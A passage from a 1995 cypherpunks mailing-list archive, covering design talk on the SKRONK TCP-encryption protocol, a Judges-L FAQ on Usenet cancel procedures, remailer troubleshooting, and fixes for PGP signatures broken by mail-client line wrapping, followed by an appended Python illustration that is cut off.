	I was going to say some similar things about firewalls, but
then decided that Strick is doing the right thing.  If the firewall
wants to offer skronk'd services, it can respond to the UDP packet,
and offer up services, presumably through relays.

	The relay/proxy programs for these protocols already exist.
So you can reuse them to carry encrypted traffic through your
firewall.  Why build a new set of proxies that have to be checked for
correctness?

	Of course, letting encrypted traffic through your firewall
will upset those people who thought they can virus/porn scan at the
firewall.  Such scanners are almost always broken anyway.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Sun, 5 Feb 95 12:33:21 PST
To: adam@bwh.harvard.edu (Adam Shostack)
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <199502052024.PAA21302@bwh.harvard.edu>
Message-ID: <m0rb8zF-0009tFC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Stephen D Williams wrote:
> 
> | > THE SKRONK MAP DAEMON
...
> 	I was going to say some similar things about firewalls, but
> then decided that Strick is doing the right thing.  If the firewall
> wants to offer skronk'd services, it can respond to the UDP packet,
> and offer up services, presumably through relays.
> 
> 	The relay/proxy programs for these protocols already exist.
> So you can reuse them to carry encrypted traffic through your
> firewall.  Why build a new set of proxies that have to be checked for
> correctness?

I wasn't talking about replacing the proxies, but 'playing' them instead
of assuming you could connect directly between the skronked program and
its server.

In other words: Since it looks like we're stuck with visible proxy
firewalls for the foreseeable future, we need to start codifying
proxy-relay semantics into new protocol preambles.  This gets us back
to more or less transparent network services.  This is especially true
of non-mainstream methods of access.

> 	Of course, letting encrypted traffic through your firewall
> will upset those people who thought they can virus/porn scan at the
> firewall.  Such scanners are almost always broken anyway.
> 
> Adam
> 
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 						       -Hume
> 


-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant    513-865-9599 FAX/LIG   513.496.5223 OH Page BA Aug94-Feb95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewall/WWW srvrs ICBM/GPS: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W wrk
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.28Jan95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Sun, 5 Feb 95 15:52:39 PST
To: cypherpunks@toad.com
Subject: Re: Zimmermann charges dropped?
Message-ID: <v03001308ab5b146037be@[140.174.229.221]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:59 2/5/95, Timothy C. May wrote:

>I could of course try to get confirmation first from Phil, but he is
>notoriously hard to reach in e-mail...

Especially when he (and presumably his attorney Phil Dubois) are on the
road, as he is this week.  I'm trying to reach PRZ at his hotel to confirm
this.

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
And so these men of Indostan/ disputed long and loud/ each in his own  |
opinion/ exceeding stiff and strong/ though each was partly right/ and |
all were in the wrong! - John Godfrey Saxe                             |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Sun, 5 Feb 95 13:16:45 PST
To: "Stephen D. Williams" <sdw@lig.net>
Subject: Re: How the cypherpunks nearly got me fired (long)
In-Reply-To: <m0raoM0-0009tFC@sdwsys>
Message-ID: <9502052116.AA01421@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    From: "Stephen D. Williams" <sdw@lig.net>
    Date: Sat, 4 Feb 1995 17:32:59 +0000 (GMT)
    
    'The Great Piss List' (whatever happened to it?)

As far as I know, Colin is still maintaining it although I haven't
corresponded with him recently.  You might try direct mail to 
Colin Owen Rafferty <colin@rafferty.com>

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: david@arch.ping.dk (David Stodolsky)
Date: Tue Sep 07 12:49:18 1999
Subject: No Subject
Message-ID: <e55da1ebf2506d48b87733fd40dd6e96@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain




According to rules recently adopted, Judges-L FAQ ver. 2.1, 
one must register before being subscribed to the List. The 
Registration Form is at the end of the Judges-L FAQ below. 
Please read the Cancel Messages FAQ first, if you have not 
already done so. It has been posted to news.admin.policy.

Judges-L Registrar,
dss

============================================================


Welcome to Judges-L

The following Frequently Asked Questions with answers are 
designed to assist you in interacting with other subscribers 
to the Judges' List and thereby assist users of the NetNews 
system in dealing with certain types of abusive messages. 
Please do not post to the List until you have been a 
subscriber for a couple of weeks, so you can avoid the most 
common mistakes made by new subscribers. Alternatively you 
can review the activities of the List by retrieving archives 
of recent discussions. You can retrieve the list of archives 
by sending "INDEX  Judge-L" (not including quotation marks)  
to LISTSERV@UBVM.CC.BUFFALO.EDU (or LISTSERV@UBVM.BITNET).  
You can then  order these files with a "GET Judge-L  
LOGxxxx". For example, to get the first month's archive, send 
the command "GET JUDGES-L  LOG9409" to retrieve the archive 
for September of 1994. 

You can unsubscribe by sending the command "UNSUB JUDGES-L" 
in the body of a message to LISTSERV@UBVM.CC.BUFFALO.EDU (or 
LISTSERV@UBVM.BITNET).

Please retain this message for future reference.
-------------------------------------------------



Judges-L: Frequently Asked Questions (FAQ) ver. 2.1



What is the Judges-L?

The Judges' List (Judges-L@UBVM.cc.buffalo.edu or 
JUDGES-L@UBVM.BITNET) is a LISTSERV mail distribution list. Messages 
for distribution must be sent to one of these addresses. 
Subscription and other LISTSERV commands must be sent to 
LISTSERV@UBVM.cc.buffalo.edu or LISTSERV@UBVM.BITNET.



How does the Judges' List work?

The List distributes messages to a panel of Judges who cancel 
multiple posts to NetNews immediately. The List is used to 
help Judges organize themselves, finalize policy, and set 
procedures to enforce rules. It is primarily directed to 
those who issue cancels. Secondarily, to those who survey 
cancels issued, in order to ensure that the cancel facility 
is not being abused.

It is not the intention of the Judges to regulate the content 
of articles posted. The protection of the NetNews system from 
overload by posts to multiple newsgroups is the focus of the 
activity. Widespread posting of off-topic material and 
overloads of individual newsgroups is a secondary focus of 
discussion.

Mechanisms for the control of automatic posting software or 
automatic cancellation software are within the scope of 
discussion. Security mechanisms to facilitate the 
cancellation of abusive posts are also within the scope of the 
List.

Certain activities, such as voting, are restricted to 
registered Judges. A Judge registers by supplying verifiable 
identity information to the Registrar. This information must 
be traceable to a primary identification document, such as a 
birth certificate. Supplied information is used only for the 
registration of a Judge. A digital signature, signed by a 
recognized certification authority can satisfy this 
requirement. The Registrar will acknowledge that registration 
has succeeded. Another option is transmission of a verifiable 
name, address, and telephone number (including best times to 
telephone). Any finger, X.500 directory, or Network 
Information Center entries, should also be supplied, in order 
to reduce the need for telephonic contact (use the form at 
the end of this post). Random checks may be undertaken from 
time to time to confirm the integrity of registration 
information. The List Registrar is currently David S. 
Stodolsky at address:
david@arch.ping.dk.



How are decisions made?

There are two types of messages distributed via the List. The 
first type is an informational message. The second type is an 
action message, which notifies readers that an official 
response is requested or pending. A response to a previous 
message must begin with the characters "Re: " (note the 
trailing space). A message that starts a new discussion must 
not start with these characters. 

Action messages must be indicated by a message subject that 
starts with all capital letters.  Current message subject 
precursors are:

:"COMPLAINT: " - a complaint about a message that someone 
wants cancelled

:"CANCEL: " - a complaint about an inappropriate cancel 
message

:"DRAFT: " - a request for preliminary input on a proposed 
action

:"OPINION: " - a proposed action not directly related to a 
complaint

:"ACCEPTED: " - an accepted action

Decisions are preferably reached by consensus. The consensus 
is indicated by at least one week passing after an action 
message, or the last comment on an action message, has been 
distributed. Thus, if an OPINION message is posted and no 
comments are made in response to it for a week, it is 
considered to have achieved a consensus. The message will 
then be redistributed in exactly the same form, but with the 
ACCEPTED message precursor. If no objections are registered 
within a week, then this opinion becomes valid. (Objections 
at this stage can only be procedural, such as failure to 
incorporate corrections or not allowing adequate time for 
comments.) If comments are received, they must be answered or 
incorporated into the accepted message. In the case of 
extensive revision, the message should be distributed again 
with an OPINION message precursor. Accepted messages are 
transferred to the file area for permanent storage. Accepted 
opinions are also posted to USENET with "Judges" as their 
sender.

In the case that a consensus is not reached within three 
weeks after the final posting of an action message, the 
author of the message can call for a vote. After the call, 
the List Registrar will post the email addresses of 
registered voters. A voter is registered if s/he supplied 
registration information to the Registrar prior to the first 
presentation of the action item. Votes are directed to the 
author, or other designated vote counter, and may include a 
statement. After a week, all votes and comments are posted. 
If a complaint achieves majority support, it can be reposted 
as ACCEPTED. Contributed statements must be included. 
Opinions require two-thirds support to achieve acceptance.

If you reply to a message, but change the subject or address 
a side issue, change the subject line of the post using the 
"was" construction [i. e., New subject (was: Old subject)]. 
This is particularly important with action items, which can 
be delayed otherwise.



Do I have to wait a week before acting on a complaint?

No. Any Judge can act on a complaint at any time. The List 
and the person who submitted the complaint must be notified 
immediately. If a complaint receives no response, it is 
assumed to be invalid. A week after the final comment on a 
complaint, it may be reposted, including all comments, with 
an "ACCEPTED: " subject precursor. This is normally done by 
the Judge who initially responded to the complaint. Unless 
there are objections, it is transferred to the file area one 
week later. A Judge must not be the first respondent to a 
complaint submitted on her/his behalf.

A Judge should only respond to a complaint if confident that 
the response is appropriate. New Judges can develop their 
reputations by closely monitoring the List. This permits 
routine abuse to be handled promptly by new Judges. More 
experienced Judges can then concentrate on handling 
complicated complaints or on incorrect responses made by 
novices.



What is the correct style for a message?

Messages to the List must follow USENET guidelines. See 
"Guidelines for posting on Usenet" and "Hints on writing 
style for Usenet" in the newsgroup "news.announce.newusers". 
Specifically, spell check your message and review it for 
accuracy. If you are irritated or upset, put it aside for a 
day, and then read both the message you are replying to and 
your response again. All messages to the List are archived 
and permanently available to subscribers.



What should I do about inappropriate messages?

Faulty or inappropriate messages should be ignored. You may 
notify the sender directly by email that there is a problem 
with such a message.

Since action items cannot be ignored, inappropriate messages 
of this type may result in censure of the sender. When in 
doubt as to the type of a message you are sending, do not use 
an action precursor. If it definitely is an action message, 
post it using the "DRAFT: " message precursor first, and 
allow at least a week for feedback. Draft messages should be 
used in all cases except where time is of the essence. 
Posting of a draft message immediately fixes the registered 
voters on the item, but reduces the risk of repeated updates 
while in the "OPINION: " phase. Since opinion messages 
require responses within a week, it is more likely that the 
feedback to them will be negative and will be less complete 
than feedback to a draft.



Can a message that has appeared on the Judges-L be reposted?

Only your own words can be reposted and only by you. Authors 
retain a non-exclusive non-transferable copyright on their 
own writing sent to the List. "Fair use" is limited to single 
words.

The non-exclusive transfer of copyright to the List Registrar 
ensures that the author can continue to use the words they 
have sent to the List, while at the same time those words can 
be used in a well controlled manner, for example, in an 
opinion issued by Judges-L. This is essential to the function 
of the List, since a participant in a dispute might try to 
block publication of an opinion by asserting copyright over 
crucial writing, if not pleased with the decision.

The non-transferability of the copyright retained by the 
author makes it impossible for List policy to be circumvented 
by a (legal) person who collects copyrights from various 
authors. It also ensures that only persons bound by the List 
policy can use material sent to the List in other contexts. 
This could also be crucial in stopping misuse of writing sent 
to the List.

"Fair use" is limited to single words. Copying of more than a 
single word violates fair use, since repeatedly copying pairs 
of words would permit the transfer of collective works from 
the List. That is, if pairs of words from a message were 
transferred repeatedly under "fair use", the original message 
could easily be assembled from the machine readable 
fragments:
"Copying shall not be used to create or to replace or 
substitute for anthologies, compilations, or collective 
works..."
{From the guidelines developed by the Ad Hoc Committee on 
Copyright Revision, the Author-Publisher Group, and the 
Association of American Publishers. COPYRIGHT LAW AND 
MULTIMEDIA DEVELOPMENT IN EDUCATION [DRAFT VERSION] in a 
document assembled by the Academic Computing Technologies 
Group, Johnson County Community College, Overland Park, KS 
66210 (in Mich Kabay <75300.3232@compuserve.com>. [27 
December 1994]. RISKS of guessing at Fair Use. RISKS DIGEST 
16.68. [URL: http://catless.ncl.ac.uk/Risks/16.68.html]}

Any subscriber posting messages to the Judges-L is bound by 
this copyright policy. Material posted by others falls under 
a Judge-L compilation copyright. Writing by persons not 
posting to the List themselves is covered by a compilation 
copyright held by the sender and the List, and subject to the 
same restrictions, wherever applicable, as original 
writing. The terms "writing" and "words" are construed to 
include all forms of expression subject to copyright, such as 
drawings, recorded sounds, and so on.

External archives of Judges-L messages and opinions can only 
be maintained if explicit written permission is given. 
Subscribers may, however, maintain archives of messages they 
have received while subscribed to the List, but only for 
their own private use and only as long as they remain 
subscribers.



Can I disclose information received from the List to third 
parties (persons not on the List)?

No. Privacy of messages sent to the List is crucial for the 
List to be able to perform its conflict resolution functions. 
Privacy makes uninhibited expression more likely, thus aiding 
in fact finding and resolution of disputes. It also protects 
authors from having their words used out of context. Finally, 
it inhibits persons not satisfied with a List decision from 
taking their complaints to another forum. The ability to 
achieve a final resolution of conflict is one of the major 
advantages of a judicial ruling.



What if I do not follow these guidelines?

Any person who provides false registration information will 
be prohibited from any use of the List for a period of five 
years and their postmaster, employer, or service provider 
will be notified thereof. At the end of that period a new 
registration form may be submitted. The document must be 
signed under penalty of perjury and notarized.

Any person misusing information from the List is subject to 
immediate unsubscription for a period of one year. A censure 
opinion must be submitted to the List immediately thereafter 
and copied to the person affected. All messages concerning 
the case must be copied to the concerned person, who may 
reply directly to the List. If the List has been set to 
automatically reject messages from the person as a result of 
abuse of the List, the person may select a representative to 
forward their replies. If the censure fails, the person will 
immediately be resubscribed.

In any case of involuntary unsubscription or of censure that 
casts doubt upon the honesty of a Judge, resubmission of 
registration information signed under penalty of perjury and 
notarized is required.
 
If you abuse the List by sending messages, you may be asked 
to stop sending for a period of six months, by issuance of an 
opinion. If you fail to honor this request, then your 
messages will be automatically rejected for a period of one 
year. An abuser may reapply after that time by sending a 
request to Dimitri Vulis (dlv@dm.com). In extreme cases, 
abusers will be unsubscribed from the List for a one-year 
period. Further problems will result in an abuser's 
postmaster being notified, or if the abuser is a postmaster, 
the notification will go to an employer or service provider. 
The Judges reserve the right to counter any continuing abuse 
of the List without further notice. 

Severe abuse can result in immediate action by a List Owner 
or Site Administrator. The Judges' List must be notified when 
any such action is taken.



How do I request censure of a Judge?

A Judge can submit an OPINION message to the List requesting 
that an abusive Judge cease, for example, sending to the 
List. Alternatively, the message can be directed to the 
Registrar, who will post it to the List, confirming that the 
message was submitted by a Judge, who wishes to remain 
anonymous. Other comments on the case may be directed to the 
Registrar, if authors wish to remain anonymous. In the case 
that a vote becomes necessary, the Registrar will randomly 
select nine Judges, if that many are available. They will be 
privately requested to deliver their votes to a designated 
Vote Counter. If three-fourths of the votes support the 
request, it will be posted as an ACCEPTED opinion by the Vote 
Counter. Dimitri Vulis (dlv@dm.com) receives such votes. 



How is conflict of interest avoided in censure cases?

Any selected Judge directly involved in the dispute must 
notify the Registrar that they are not available to vote. In 
the case this withdrawal could affect the vote outcome, a new 
Judge will be randomly selected. The accused may advise the 
Registrar that certain Judges are directly involved and 
should not be selected. No more than one-third of Judges may 
be designated as unsuitable. Neither the Registrar nor the 
Vote Counter may serve as voters in censure cases.



Why should I use this List instead of a newsgroup?

Discussions of abusive practices also occur in the 
newsgroups, for example, news.admin.policy. That newsgroup 
has over 50,000 readers and over 50% of articles are 
crossposted. Each post, therefore, uses a minimum of 20 man-
hours of readers' time, even if each reader spends only a 
second reading the subject line of an article. Examination of 
the post itself can lead to ten times that amount of time 
being used, or even more.  It is suggested, therefore, that 
posts to newsgroups be limited to novel incidents, with the 
potential for generating a new policy consensus. Routine 
abuse can be handled in a much more economical manner, if it 
is referred to this List.

Another advantage of using the List for cancel notifications 
is the almost immediate delivery of email. Newsgroup 
propagation is significantly slower, meaning that duplicate 
cancels may be issued. This can create problems and certainly 
means unnecessary work for administrators.

Consensus rarely occurs in newsgroups, if there is even the 
slightest disagreement on an issue. In order to create an 
alternative to arbitrary cancellation, cancellation wars 
between posters and administrators, and so on, it is 
important to reach a consensus through a process that is open 
and fair. A list makes it more likely that every person sees 
the same material, which cannot be assured with people 
browsing newsgroups. Also, lists are less "public", so there 
is less incentive for people to defend positions, merely 
because they have taken them. This is a well-known problem in 
international negotiations. These factors, when combined with 
the procedures suggested here, make reaching a consensus on 
the List much more likely than in a newsgroup.

Another advantage of List operation is the privacy of the 
List archives. This makes it less likely that disputants 
seize upon details of statements made by Judges as indicating 
support for their position. The transfer of completed 
decisions to the publicly accessible file area, on the other 
hand, makes them more likely to be used as guidance in dispute 
resolution. These completed decisions can also be used as a 
database of known offenders, in order to facilitate dealing 
with repeated abuse. This effect is even stronger in the case 
of accepted opinions, which are posted to USENET.

Finally, there are some people who cannot understand that it 
is not OK to do anything that is not explicitly against some 
"law." These people need some "legal" decisions to abide by, 
because they will not stop abusive activities otherwise. They 
may also view cancellation of their articles as abridging 
their "free speech" or "restraining their trade" and take 
their complaint to a court. The Judges-L can be the court of 
first instance, thereby reducing the risk of interference by 
governmental authorities with activities on the Net.

-----------------------------------------------------------

            Judges-L Registration Form

This form serves as a copyright agreement, non-disclosure 
agreement, and oath:

I have read and understood the Cancel Messages Frequently 
Asked Questions (FAQ) list and the Judges-L FAQ. I understand 
why archive privacy is required and the role confidentiality 
plays in dispute resolution.

I agree to:

a) respect the Judge-L copyright and report any violations 
thereof.

b) avoid disclosing information received from the List to 
third parties (persons not on the List) and report any 
violations of this policy.

c) store messages received from the List in a manner that 
prevents disclosure to third parties (at minimum, password 
protection on a publicly accessible system, or residential 
level physical security for unprotected files or messages 
that have been printed).

d) destroy all copies of messages from the List within 14 
days of unsubscribing (this does not apply to setting an 
address to "no mail", which stops transmission of messages).

e) follow the procedures accepted by the Judges (subscribers 
to Judges-L).

f) tell the truth, the whole truth, and nothing but the 
truth, in messages sent to the List or directly to persons 
subscribed to the List. That is, I agree that deception is to 
be avoided, either through incorrect statements or omission 
of relevant facts. If statements made in good faith are later 
found to be incorrect, the correct information will be 
supplied without delay. Notwithstanding the above, if 
another subscriber is misled by my statement and makes an 
incorrect statement on the List as a result, I will correct 
that person in a message to the List.

g) base any decision I make as a Judge only on messages to 
the List. If I receive communications concerning a matter 
under deliberation on Judges-L by other means (i. e., private 
mail, news, etc.), I will send a notice to the List. If I do 
not disclose the information, I will state why. Further, I 
will state whether I feel receipt of the information 
disqualifies me from further participation in the 
deliberation and why.

h) attempt to influence Judges-L decisions only through 
messages posted to the List under my registered name.


I understand that if I violate this agreement I may be 
subject to censure and that an accepted censure opinion may 
be posted to the Judges-L public file area and published in 
appropriate USENET newsgroups. I agree to accept any such 
ruling as final.


Replace underlines "____" completely (in relevant items) with 
your information and return to:
david@arch.ping.dk

Last name                         __________________________
Other names, initials, titles, etc. ________________________
Address                           __________________________
City, State, Country, ZIP, etc.   __________________________
Telephone number (include country code) ____________________
Best times to Phone   From _____ to _____ and _____ to _____

Work or other address             __________________________
City, State, Country, ZIP, etc.   __________________________
Telephone number (include country code) ____________________
Best times to Phone   From _____ to _____ and _____ to _____

Finger entry                       _________________________
X.500 directory listing            _________________________
Network information center entries _________________________
                                   _________________________
Other directory entries            _________________________
                                   _________________________
                                   _________________________
                                   _________________________

-----------------------------------------------------------

===========================================================


David S. Stodolsky, PhD  * Social *   Internet: david@arch.ping.dk
Tornskadestien 2, st. th.   * Research *    Tel.: + 45 38 33 03 30
DK-2400 Copenhagen NV, Denmark  * Methods *  Fax: + 45 38 33 88 80





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 5 Feb 95 13:17:47 PST
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <199502052024.PAA21302@bwh.harvard.edu>
Message-ID: <9502052117.AA02893@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack says:
> 	I was going to say some similar things about firewalls, but
> then decided that Strick is doing the right thing.  If the firewall
> wants to offer skronk'd services, it can respond to the UDP packet,
> and offer up services, presumably through relays.

I was going to mention something about not putting excess thought into
the fifth or sixth "encrypt tcp connections" hack I'm aware of, but...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 5 Feb 95 13:19:33 PST
To: sdw@lig.net (Stephen D. Williams)
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <m0rb8zF-0009tFC@sdwsys>
Message-ID: <9502052119.AA02901@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Stephen D. Williams says:
> In other words: Since it looks like we're stuck with visible proxy
> firewalls for the foreseeable future, we need to start codifying
> proxy-relay semantics into new protocol preambles.

Or simply codify the firewall techniques, a la the IETF AFT group...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Sun, 5 Feb 95 16:31:18 PST
To: cypherpunks@toad.com
Subject: Re: BROKEN REMAILERS
Message-ID: <ab5b1a2a020210049a0d@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


>I have tested remailers and their PGP keys over some time now and this is
>what I have found:
>
>MIXMASTER is a great, fast and reliable remailer but you can't PGP with it.
>
>REMAILER@NATELY.UCSD.EDU is just as fast and reliable (same guy) and you
>can use PGP, but a few weeks ago it started acting really funny: It will
>forward any ATTACHED files, but it will only read the first commandline
>of a PGP block that has been pgp'ed with Nately's public key.  In other
>words, if you wrap layers of chained remailers inside each other, you
>will now have to have NATELY as the *last* link in your chain as it will
>otherwise discard the rest of the block. Alternatively you can have the
>chain as a series of attached files.
>

I am not sure what is going on with remailer@nately. I just tested it,
sending a PGP encrypted message chained through it 3 times, I also sent a
message chained through nately to c2. They both worked fine. Are you using
a program to build the chain, like "Chain"? If so, which?


Mixmaster now has a PGP key (it has had one for a long time for testing
purposes, this is a new one). The front end for using mixmaster remailer
type 2 messages is on my WWW page. Right now it only runs on Suns.


--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Check out my essay on the next generation remailer Mixmaster on the WWW page.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick at The Yak <strick@yak.net>
Date: Sun, 5 Feb 95 17:06:28 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: "encrypt tcp connections" hacks
Message-ID: <199502060105.RAA07673@nando.yak.net>
MIME-Version: 1.0
Content-Type: text/plain


Perry, could you enumerate them?  I take your opinions more
seriously than perhaps I should, so I want to understand
what you're saying.

I'm not doing this to re-invent the wheel.  I'm doing it because
I need it, and nothing else is working very well for me.

I'm doing it because I don't see anything that's easy-to-use in wide
use today.  I don't just want one or two encrypted applications -- like
the Kerberos telnet and rcp -- but something to transparently provide
privacy for all TCP sockets -- like SMTP sockets between (re)mailers,
NNTP, X11, FTP, MUDs, etc.

Let me name the ones I can think of.

  1.  	Matt Blaze just announced one.  As always, he has the best
	crypto.  But his world interface seems to be a hacked up
	script.c.  If I lift his crypto, and make it a standard
	module in Skronk, I can reuse 90% of his good work.

  2.	Kerberos4.  I use Kerberos4 between home and work all the time.
	However the only command I have that actually encrypts the
	session is the "rlogin" replacement.  (But I sure use it, even 
	if it's just DES.)

	Also Kerberos administration is a nightmare.  I'm a fairly
	knowledgeable crypto hacker and unix system administrator but
	honestly I don't understand what I did.  If it weren't for
	the Cygnus installation manuals giving line-by-line
	instructions, I wouldn't have made it.  I've taken the 
	reference manuals to bed with me several times, but still
	haven't gotten a grasp of how to fully use it.

	And the reason big providers like The Well and Netcom won't
	run kerberos (or at least not the last time I asked) is that
	they would have to hire another person just to do the
	password management etc.  Skronk should be "just plug it in
	and it works".  There should be no reason why big providers
	can't offer it as an option.

  3.	Kerberos5.  I've been unable to build Kerberos5 on my 
	sun3.  Honestly.  To build it, I have to have ISODE, which seems 
	to be some enormous ISO thing that I haven't been able to build.

	Again, not too encouraging for your average unix sys admin.

  4.	The new telnet program with Telnet Options for authentication
	and encryption.  Well it won't do encryption unless you
	can get the authentication done, and so you're back to 
	problems 2 and 3 above.  I couldn't get it to work in 
	an evening, and decided the world needed something better.
	Also even if it did work, it's only Telnet.  None of the other
	apps I named above can use it.

  5.	Standards for IPng.  Vapor, as far as I know.  Is there any
	usable code, that works in IP this generation?


I think it comes down to the fact that, of these, only Skronk and 
Blaze's software use a Diffie-Hellman-like Key Exchange so that
administration stuff doesn't have to be done by humans and footnet.

The real value I'm adding is not the crypto.  It's the packaging.
When I'm done it should be possible to skronk all your current 
clients and servers by just overriding the shared library libc.so,
running a skronk map UDP daemon, and customizing a configuration
file to tell the daemon what to say.


=================

As for the UDP service:

> UDP won't get through most firewalls.
> 
> Build in support for non-transparent firewalls (ie: telnet gatekeeper,
> c sys port).

UDP packets are for automatic configuration of skronk maps.  
Skronk maps could be announced other ways too -- including via
manual configuration, where you put skronk maps in your SKRONK_CONF
environment variable.

I may have to spend more effort on this than I wanted to.   I have
a SKRONK_CONF variable, and an option to say "don't ask the UDP 
skronk map daemon" about this port, just skronk it -- but right now 
it's only dependent on port number, not on the IP address too.
This can be fixed.

> UDP Port 333 - does this imply you need to be root to use it,
> at least as a server, or are only TCP ports typically root-limited
> for low-number ports?
>                 Bill

You need to be root to install it properly on your system, for the
skronked services to become bona fide system services.  Users should
not be able to hijack SMTP and TELNET connections to a site unless
they're root.

For people who run their own web server on a nonstandard port on a 
machine that someone else administers -- we're back to the manual
configuration method.  Maybe we can build a PGP service with 
signed certificates to collect nonstandard skronked services.  
But really I think these services will be marginal.



I had thought about using DNS TXT records.  But I decided against that
because a *lot* of people have autonomy over their workstation on
the net, but not over their DNS records.   Linux boxen in dorm rooms
come to mind.  Or anyone who puts a new machine on someone else's
ethernet, grabbing an IP address via ARP.


================= 

Thanks to everyone for your comments.

The discussion question is -- if we have so many hacks already -- 
how come they're not in use.  I hope I found the reasons and addressed
them.  The firewalls issue bugs me a bit.  Would using a well-known
TCP port instead of the UDP port fix the problem?  I don't think 
so.  Firewalls will block my new TCP port as well.  Matt Ghio's
project to tunnel through the telnet port sounds good.  Of course,
that defeats the purpose of the firewall, which is not my aim.
My aim is to work with the internet and within its policies, so it
can get widespread use.

How much of skronk works today?  I'm nearing alpha of a version that's
hardwired to do DH exchange (using RSAREF2.0) and IDEA CBF (stolen from
PGP sources) for the symmetric encryption.  But I broke it recently
when I added hacks for servers to fake select() listening on both
skronked and normal ports, when the program only thinks it's only
listening on normal ports.


I gotta go ...     strick


==================


p.s.	need some wizard-level help here.

	I use syscall(2) when I reimplement read() write() connect()
	accept() etc. on SunOS. 

	On LINUX I borrowed code from the libc sources.

	On HPUX and Solaris and AIX I'm having difficulty finding
	a way to do what system calls do, without using the
	manufacturer's packaging.  

	any help would be appreciated.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Sun, 5 Feb 95 17:28:35 PST
To: tjb@acpub.duke.edu (Tom Bryce)
Subject: Re: signature validation on secure edit messages
Message-ID: <199502060128.AA07417@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Try turning Word Wrap off in Eudora.  I was encountering the same thing
in the Windows version of Eudora.  With Word Wrap on, it seems to add CRs
(or CR/LFs on a PC) to the end of each line upon sending.  This obviously
causes a message not to match the signature, since all of those CRs
weren't there when you composed it.  With Word Wrap off, your text still
wraps on the screen when you're composing, but those unwanted CRs in the
sent mail don't get added.

Joel McNamara
joelm@eskimo.com - finger for PGP key
    
>Jeez. I really don't know why the heck this always happens to me, my
>digsigs not validating.
>
>You can finger me at tjbryce@amherst.edu to retrieve a message with a valid
>signature.
>
>I always write the message in eudora, copy it, sign it in MacPGP as TEXT
>with attached signature, then go back and paste it over the old message.
>Then I go back to MacPGP and check the signature on the clipboard to be
>sure - no problems. But after getting mailed, it doesn't work.
>
>Damn.
>
>Tom
>
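
Added example (not part of Joel McNamara's or Tom Bryce's messages): a
simplified Python model of why line breaks inserted on send invalidate a
text-mode signature, while a plain CR/LF versus LF difference does not.
SHA-256 stands in for the digest a signature covers; the canonicalization
rule, the sample text and all function names are assumptions made for
illustration, not PGP's or Eudora's code.

```python
import hashlib
import textwrap

# Constructed sample message: one long line plus a short paragraph.
SIGNED = (
    "Try turning word wrap off before sending, otherwise the signed text "
    "changes in transit.\n"
    "\n"
    "Second paragraph stays short.\n"
)


def canonical_text(body: str) -> bytes:
    """Simplified canonical form for a text-mode signature (assumption):
    every line ending becomes CRLF and trailing spaces/tabs are dropped."""
    lines = body.replace("\r\n", "\n").replace("\r", "\n").split("\n")
    return "\r\n".join(line.rstrip(" \t") for line in lines).encode("utf-8")


def digest(body: str) -> str:
    """Digest of the canonical text; stands in for the signed hash."""
    return hashlib.sha256(canonical_text(body)).hexdigest()


def hard_wrap(body: str, width: int = 40) -> str:
    """Model a mail client that inserts real line breaks when sending."""
    out = []
    for line in body.split("\n"):
        # textwrap.wrap() returns [] for an empty line; keep it as "".
        out.extend(textwrap.wrap(line, width) or [""])
    return "\n".join(out)


def diagnose(signed: str, received: str) -> str:
    """Classify why a received body does or does not verify.

    "match"           - canonical text is identical, signature would verify
    "rewrapped"       - same words, different line breaks or spacing
    "content-changed" - the words themselves differ
    """
    if digest(signed) == digest(received):
        return "match"
    if signed.split() == received.split():
        return "rewrapped"
    return "content-changed"


if __name__ == "__main__":
    crlf_copy = SIGNED.replace("\n", "\r\n")   # transport changed line endings
    wrapped_copy = hard_wrap(SIGNED)           # client wrapped on send
    edited_copy = SIGNED.replace("short", "long")
    for name, body in [("CRLF copy", crlf_copy),
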